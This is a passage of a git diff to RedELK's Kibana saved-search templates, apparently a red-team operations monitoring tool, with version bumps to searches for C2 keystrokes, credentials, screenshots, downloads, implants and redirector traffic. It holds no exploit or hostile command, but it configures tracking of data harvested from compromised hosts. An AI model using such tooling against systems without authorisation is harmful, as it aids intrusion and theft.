"7.16.2", "id": "rtops", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642157817846, 34863], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fieldAttrs": "{\"c2.program\":{\"count\":1}}", "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"event.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Event URL\"}},\"file.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"/\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"File download\"}},\"implant.log_file\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}},\"keystrokes.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full keystrokes\"}},\"screenshot.full\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full screenshot\"}},\"screenshot.thumb\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"type\":\"img\",\"urlTemplate\":\"/../..{{rawValue}}\"}},\"implant.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "rtops-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.3", "id": "rtops", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171870762, 242], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_search.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_search.ndjson index a241cb37..3592c569 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_search.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_search.ndjson @@ -1,16 +1,16 @@ -{"attributes": {"columns": ["infra.attack_scenario", "agent.hostname", "redir.backend.name", "source.ip", "source.domain", "source.as.organization.name", "http.request.body.content"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - _Redirector Traffic", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2152], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "ioc.type", "file.hash.md5", "file.name", "file.size", "ioc.domain"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"tags:alarm_*\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"ioc\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"ioc\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 IOCs - Alarmed", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2155], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "c2.message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"events\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"events\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"events_joinleave\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"events_joinleave\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"credentials\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"credentials\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"keystrokes\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"keystrokes\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"downloads\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"downloads\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"screenshots\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"screenshots\"}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - _Red Team Operations", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2163], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "file.directory", "file.name", "file.url"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"value\":\"downloads\",\"params\":{\"query\":\"downloads\",\"type\":\"phrase\"},\"disabled\":false,\"alias\":null,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"downloads\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Downloads", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2166], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "c2.message", "keystrokes.url"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"keystrokes\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"keystrokes\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Keystrokes", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "3afbdbc0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2169], "type": "search", "version": "1"} -{"attributes": {"columns": ["creds.realm", "creds.username", "creds.credential", "creds.host", "creds.source"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Credentials", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "3fabe620-6c38-11ea-97d6-55783aed877a", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "credentials", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2171], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "ioc.type", "file.hash.md5", "file.name", "file.size", "ioc.domain"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"ioc\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"ioc\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 IOCs", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2174], "type": "search", "version": "1"} -{"attributes": {"columns": ["module.name", "module.type", "module.last_run.timestamp", "module.last_run.status", "module.last_run.count", "module.last_run.message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"exists\",\"key\":\"module.name\",\"value\":\"exists\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"exists\":{\"field\":\"module.name\"},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [], "title": "RedELK - Modules status", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "654f76a0-9269-11eb-a753-9da683898c26", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2177], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "redir.backend.name", "source.ip", "source.domain", "source.geo.as.organization.name", "source.geo.country_iso_code", "http.request.body.content"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"tags:alarm_*\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - Redirector Traffic - Alarmed", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2179], "type": "search", "version": "1"} -{"attributes": {"columns": ["implant.id", "infra.attack_scenario", "host.name", "user.name", "host.ip_int", "host.ip_ext", "implant.arch", "host.os.name", "host.os.version", "host.os.kernel", "implant.parent_id", "host.geo.as.organization.name", "host.geo.country_iso_code"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 implants overview", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "implantsdb", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2181], "type": "search", "version": "1"} -{"attributes": {"columns": ["iplist.name", "iplist.source", "iplist.ip"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [], "title": "RedELK - IP Lists", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "87530b40-9269-11eb-a753-9da683898c26", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "789bb360-2ab1-11eb-bc47-53169c986c81", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2183], "type": "search", "version": "1"} -{"attributes": {"columns": ["bluechecktype", "message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - BlueCheck", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "a4757c90-ce50-11ea-a580-918d4757c08d", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "bluecheck", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2185], "type": "search", "version": "1"} -{"attributes": {"columns": ["attackscenario", "from", "to", "subject", "emailfolder"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [], "title": "RedELK - Emails", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "c1fca0d0-d171-11ea-8ac3-bfcfabda2250", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "email", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152855820, 2187], "type": "search", "version": "1"} -{"attributes": {"columns": ["user.name", "host.name", "c2.message", "threat.technique.id"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"implant_task\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_task\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [], "title": "RedELK - C2 Tasks", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "cc523820-d021-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2190], "type": "search", "version": "1"} -{"attributes": {"columns": ["c2.message", "host.name", "user.name", "implant.id"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"event.module\",\"params\":{\"query\":\"redelk\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"event.module\":\"redelk\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [], "title": "RedELK - Signals", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2193], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "screenshot.full", "screenshot.thumb"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"screenshots\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"screenshots\"}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Screenshots", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2196], "type": "search", "version": "1"} \ No newline at end of file +{"attributes": {"columns": ["infra.attack_scenario", "agent.hostname", "redir.backend.name", "source.ip", "source.domain", "source.as.organization.name", "http.request.body.content"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - _Redirector Traffic", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 198], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "ioc.type", "file.hash.md5", "file.name", "file.size", "ioc.domain"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"tags:alarm_*\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"ioc\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"ioc\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 IOCs - Alarmed", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 201], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "c2.message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"events\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"events\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"events_joinleave\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"events_joinleave\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"credentials\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"credentials\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"keystrokes\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"keystrokes\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"downloads\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"downloads\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"screenshots\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"screenshots\"}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - _Red Team Operations", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 209], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "file.directory", "file.name", "file.url"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"value\":\"downloads\",\"params\":{\"query\":\"downloads\",\"type\":\"phrase\"},\"disabled\":false,\"alias\":null,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"downloads\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Downloads", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 212], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "c2.message", "keystrokes.url"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"keystrokes\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"keystrokes\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Keystrokes", "version": 1}, "coreMigrationVersion": "7.16.3", "id": 